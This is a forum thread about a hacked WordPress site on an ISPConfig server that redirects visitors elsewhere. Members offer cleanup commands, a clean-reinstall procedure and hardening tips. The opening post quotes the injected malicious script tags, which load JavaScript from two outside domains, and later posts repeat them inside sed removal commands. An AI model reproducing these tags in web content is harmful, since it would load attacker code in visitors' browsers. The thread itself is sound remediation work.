Wordpress site hacked on ISPConfig 3 server and automatically redirects to another site

Discussion in 'General' started by onastvar, May 2, 2020.

  1. onastvar

    onastvar Member

    One of the websites (wordpress) on ISPConfig 3 server got hacked and automatically redirected to another site. I think it happened on 4/24/2020. I had setup daily backup on this website, so i cannot restore it with clean version, because I realized late site was hacked. I purchased and ran ISP-PROTECT for entire server, which did not find any malware for this website (/var/www/clients/client2/web16). Many PHP files have the following injection

    <script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>

    Error log is currently 0kb. i had some odd jobs in /var/www which i killed/deleted, because server was showing low resources.

    I'm trying to find out how to stop the bleeding and fix the website.
    I cannot access wp-admin or website, it redirects.
    Thanks in advance if anyone could help i would appreciate
    also if you need more details pls let me know
    Last edited: May 3, 2020
  2. Th0m

    Th0m ISPConfig Developer Staff Member ISPConfig Developer

    Did you change anything in the site settings? Sounds like SSL is disabled. You could search for:
    site:howtoforge.com wrong website shown
  3. onastvar

    onastvar Member

    No changes to any settings. SSL & Let's Encrypt SSL was checked under Sites > website 16
  4. Steini86

    Steini86 Active Member

    Have a look here: https://wordpress.org/support/topic/hacked-138/
    A solution to restore your site is given.
    Make sure when copy'n pasting the commands you have the right " and '
    Sometimes they get corrupted when copying.
    Be aware, that this only brings your site back and does not fix the initial problem. You should also consider that the attacker had access to your database and all your stored data / passwords of that user could be exposed.

    In general, for a hacked Wordpress site, follow: https://wordpress.org/support/article/faq-my-site-was-hacked/
    Last edited: May 3, 2020
  5. onastvar

    onastvar Member

    Thanks @Steini86
    I came across both pages you listed in your post, with no luck to access website wordpress backend.

    I'm not successful with following command (I changed " and ')

    when I issue command:

    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221; {} +

    i get


    I have to CRTL+C to exit from >

    As soon as I found out the issue, i changed password for FTP/DB, I don't see any users created in table wp_users, siteurl was correct in wp_options table (viewing in phpmyadmin)

    Any other suggestions?
  6. Steini86

    Steini86 Active Member

    The command has an opening ", but no closing. That is why you get this behavior.
    I am not really an expert, but you could try
    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221;" {} +
    The alternative is to execute just "find . -name "index.php" and edit each file by hand.
  7. onastvar

    onastvar Member

    Thanks again!

    When i issue:

    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g&#8221;" {} +

    i get

    sed: -e expression #1, char 94: unknown option to `s

    find . -name "index.php
    150 index.php files within website folder /var/www/clients/client2/web16/web
  8. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    There is syntax error in sed command, probably at or around character position 94 of the command.
    You must figure out how to fix that error, read sed manual page or instructions from Internet.
    Or use some programming or script language you do know, and program the character string search and relpace with that.
  9. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    change the salts in wp-config.php
    change any author/editor/admin users (or make them change them) passwords in wordpress.
    if you don't already, configure fail2ban to block too many failed login attempts on wp-login.php and xmlrpc.php
    (be careful with this config, the forgot password and register urls are appended as wp-login.php?******* so don't just block on the wp-login.php string, or it could block an ip for a single login failure.) or us wordfence or similar to do the same thing.
    if xmlrpc isn't needed/used on the site, then block/disable it and jetpack.
  10. Steini86

    Steini86 Active Member

    find . -name "index.php" -exec sed -i  "s%<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>%%" {} +
    Warning: Untested! I would suggest to copy one of the malicious files in a new folder and try the script there.
    There are tons of sed tutorials out there and you can try your regular expressions here: https://regex101.com/
    Good luck!
  11. onastvar

    onastvar Member

    Steini86 likes this.
  12. Steini86

    Steini86 Active Member

    Could be caching issue. Have you tried with browser in private mode?
  13. onastvar

    onastvar Member

    Sorry no luck with browser in private mode, same issue, still redirects.
  14. Steini86

    Steini86 Active Member

    Then somewhere is still a redirect configured. You can search for the redirect for example with grep:
    grep -rli "stivenfernando.com" /var/www/hackedWordpress/web
    Could also be in the hidden .htaccess files

    You should extract your data and make a clean re-installation
  15. onastvar

    onastvar Member

    thanks @Steini86
    I found 20 files "._index.php" and 15 files "awsindex.html" cleaned them, still redirects.
    how do i extract DATA,
    this site has bookly plugin for booking
    besides that, its pretty much simple 5 page website.
  16. Steini86

    Steini86 Active Member

  17. onastvar

    onastvar Member

    I tried private mode, still redirects. I already checked 3 links you mention, they have no solution.
  18. till

    till Super Moderator Staff Member ISPConfig Developer

    Might be that the redirect has been injected in the database as well.
  19. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    copy your uploads folder, wp-config.php, and .htaccess into /private.
    mysqldump your database into /private, usie the --extended-insert=false option, makes it easier to read if you need to look at it manually.
    drop the database, create a new blank database.
    clear out /web of everything except the stats folder and the errors folder. make sure you delete all the hidden files as well.
    download and extract a clean wordress to the original location.
    check wp-config.php and .htaccess files are clean, and move them back to it's original location.
    run the same regex script you used on index.php on the database dump.
    check the database dump for strings like base64, eval, and decode.
    if there are any, check them carefully, they may be malicious, they may be legit. delete the malicious ones.
    copy the /private/uploads folder back into the wp-content folder
    to make sure all files/folderss still have correct permissions and ownership, cd into /web and :
    find . -type d -exec chmod 755 {} \;
    find . -type f -exec chmod 644 {} \;
    chown -R <webid><clientid> *

    import the database
    re-install the wordpress theme and plugins.
    you should also check that everything in the errors and stats folders are clean as well.

    you may also want to consider running that regex against all the files, not just instances of index.php, or just php files.
    these bastards have a tendency to add these bits of script calls and base64 encoded shit all over the place, and to hide php script file as image files...:mad:
  20. onastvar

    onastvar Member

    Any advice on how to find redirect injected in the database. Wp_options table site_url is correct, i tried searching entire DB for "stivenfernando" nothing found.

Share This Page